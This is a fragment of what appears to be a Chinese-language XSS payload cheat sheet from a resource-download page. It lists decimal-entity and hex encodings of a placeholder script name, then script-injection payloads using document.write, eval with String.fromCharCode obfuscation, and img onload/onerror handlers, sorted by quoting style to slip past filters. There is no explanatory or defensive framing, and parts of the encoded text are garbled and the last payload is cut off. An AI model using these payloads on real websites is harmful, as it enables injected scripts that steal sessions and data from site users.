36;e;&#x0069�
3b;x
Html 十 进 制 实 体 编 码 一 次 编
码:Mannix
Html 十 进 制 实 体 编 码 二 次 编
码 :&#000077&
#000097&#&#
000048000110&#�
048000110&#0
000105&#0&#
00004800120
Mannix
Man
ni&#12
0;
Hex 一次编码:d616e6e6978
Hex 二次编码:346436313665366536393738
双引号版
document.write("<script src=\"M\"><\/script>");
单引号版
document.write('<script src=\'M\'><\/script>');
无引号版
document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,77,97,11
0,110,105,120,39,62,60,92,47,115,99,114,105,112,116,62));
eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));windo
w.s.src=String.fromCharCode(77,97,110,110,105,120);document.body.appendChild(window.s)')
带引号版
<img/src="http://www.baidu.com/img/baidu_sylogo1.gif"
onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));wi
ndow.s.src=String.fromCharCode(77,97,110,110,105,120);document.body.appendChild(window.s
)">
无引号版
<img/src=http://www.baidu.com/img/baidu_sylogo1.gif
onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,11
2,116));window.s.src=String.fromCharCode(77,97,110,110,105,120);document.body.appendChild
(window.s)})()>
带引号版
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105
,112,116));window.s.src=String.fromCharCode(77,97,110,110,105,120);document.body.appendC
hild(window.s)">
无引号版
<img/src=M
onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,1
12,116));window.s.src=String.fromCharCode(77,97,110,110,105,120);document.body.appendChil
评论0
最新资源